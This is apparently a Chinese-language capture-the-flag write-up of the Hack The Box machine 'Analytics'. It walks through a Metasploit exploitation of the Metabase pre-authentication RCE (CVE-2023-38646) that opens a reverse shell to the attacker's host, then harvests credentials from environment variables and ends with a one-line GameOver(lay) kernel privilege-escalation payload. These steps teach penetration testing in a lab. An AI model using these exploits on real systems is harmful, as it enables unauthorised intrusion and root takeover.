信息搜集

1
2
3
4
5
6
7
8
9
10
11
sudo nmap -p- -min-rate 10000 10.10.11.233
[sudo] kali 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 13:44 CST
Nmap scan report for analytical.htb (10.10.11.233)
Host is up (0.12s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 7.20 seconds

/etc/hosts

1
2
10.10.11.233 analytical.htb
10.10.11.233 data.analytical.htb

user-metabase

发现 Metabase 有一个最近披露的预身份验证 RCE 漏洞;CVE-2023-38646

该系统在0.46.6.1之前的开源版本和1.46.6.1之前的企业版本中存在漏洞。

/api/session/properties(无需授权也可访问)泄露setup-token

我这里直接用msf;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿kali)-[~]
└─$ msfconsole

msf6 > search metabase

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/linux/http/metabase_setup_token_rce  2023-07-22       excellent  Yes    Metabase Setup Token RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/metabase_setup_token_rce                                                                                 

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/http/metabase_setup_token_rce) > set rhost http://data.analytical.htb/
rhost => http://data.analytical.htb/
msf6 exploit(linux/http/metabase_setup_token_rce) > set lhost 10.10.16.5
lhost => 10.10.16.5
msf6 exploit(linux/http/metabase_setup_token_rce) > set rport 80
rport => 80
msf6 exploit(linux/http/metabase_setup_token_rce) > run

[*] Started reverse TCP handler on 10.10.16.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.46.6
[+] Found setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
[*] Sending exploit (may take a few seconds)
[*] Command shell session 1 opened (10.10.16.5:4444 -> 10.10.11.233:49520) at 2024-01-01 13:49:23 +0800
                                                                                                                                                                                                 
whoami                                                                                                         
metabase

user-metalytics

敏感信息藏得挺深的,居然在环境变量里面;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
env                                                                                                            
MB_LDAP_BIND_DN=                                                                                               
LANGUAGE=en_US:en                                                                                              
USER=metabase                                                                                                  
HOSTNAME=f119c1f252f8
FC_LANG=en-US
SHLVL=5
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
HOME=/home/metabase
MB_EMAIL_SMTP_PASSWORD=
LC_CTYPE=en_US.UTF-8
JAVA_VERSION=jdk-11.0.19+7
LOGNAME=metabase
_=/bin/sh
MB_DB_CONNECTION_URI=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_PASS=
MB_JETTY_HOST=0.0.0.0
META_PASS=An4lytics_ds20223#
LANG=en_US.UTF-8
MB_LDAP_PASSWORD=
SHELL=/bin/sh
MB_EMAIL_SMTP_USERNAME=
MB_DB_USER=
META_USER=metalytics
LC_ALL=en_US.UTF-8
JAVA_HOME=/opt/java/openjdk
PWD=/
MB_DB_FILE=//metabase.db/metabase.db

中发现

1
2
META_USER=metalytics
META_PASS=An4lytics_ds20223#

ssh登陆成功

1
2
ssh metalytics@10.10.11.233 
An4lytics_ds20223#

user-root

sudo -l没有利用点

1
2
3
metalytics@analytics:~$ sudo -l
[sudo] password for metalytics: 
Sorry, user metalytics may not run sudo on localhost.

suid没有利用点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
metalytics@analytics:~$ find / -perm -4000 2>/dev/null
/var/tmp/bash
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

uname -a

1
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

使用 CVE-2023-2640 和 CVE-2023-32629 获取非 Root 容器的 Root 权限,又名 GameOver(lay)

payload只有一行

1
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'

Vulnerable kernels

Kernel version Ubuntu release
6.2.0 Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish)
5.19.0 Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)
5.4.0 Ubuntu 22.04 LTS (Local Fossa) / Ubuntu 18.04 LTS (Bionic Beaver)

总结

耐心,坚持,研究和技术技能的结合让我实现了目标。